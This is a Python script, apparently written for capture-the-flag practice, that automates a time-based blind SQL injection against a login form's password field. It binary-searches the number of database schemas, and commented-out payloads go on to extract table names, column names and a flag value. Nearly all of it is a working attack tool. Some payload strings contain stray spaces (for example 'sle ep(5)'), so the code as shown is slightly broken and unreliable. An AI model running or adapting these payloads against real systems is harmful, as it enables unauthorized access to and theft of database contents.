import requests import sys import time import pdb class Injection(): def __init__(self): self.url = "" self.schemataNum=0 def InjectionSchemaNumber(self): high = 30 low = 1 mid = (low + high) // 2 while high > low: payload = f"1' or if((select count(schema_name) from information_schema.schemata)>{mid},sle ep(5),0)-- +" #查库名 #payload = f"1'or if(ascii(substr((seleCt(group_concat(table_name))from(information_schema. tables)where(table_schema)='note'),{i},1))>{mid},sleep(2),1)#" #查表名 #payload = f"1'or if(ascii(substr((seleCt(group_concat(column_name))from(information_schema .columns)where(table_name)='users'),{i},1))>{mid},sleep(2),1)#" #查列名 #payload = f"1'or if(ascii(substr((seleCt(flag)from(fl4g)),{i},1))>{mid},sleep(2),1)#" #查数据 data = { "uname":"admin", "passwd":payload, "submit":"Submit" } last = int(time.time()) try: res = requests.post(self.url, data = data) except Exception as e: print(e) finally: now = int(time.time()) if now - last >5 : low = mid else : high = mid mid = (low + high) // 2 if mid==low and high-low==1: #print("The Number of schema is {}".format(high)) self.schemataNum=high #break return #print(low,mid) self.schemataNum=mid def Usage(self): if len(sys.argv)!=2: print('The number of parameter number not right') print('Usage:python3 %s url '% sys.argv[0]) print("Example:python3 postInjection.py http://192.168.62.249/login.php username=admin&password=admin password") sys.exit(-1) self.url = sys.argv[1] if __name__ == '__main__': # pdb.set_trace() inject = Injection() inject.Usage() inject.InjectionSchemaNumber() print(inject.schemataNum)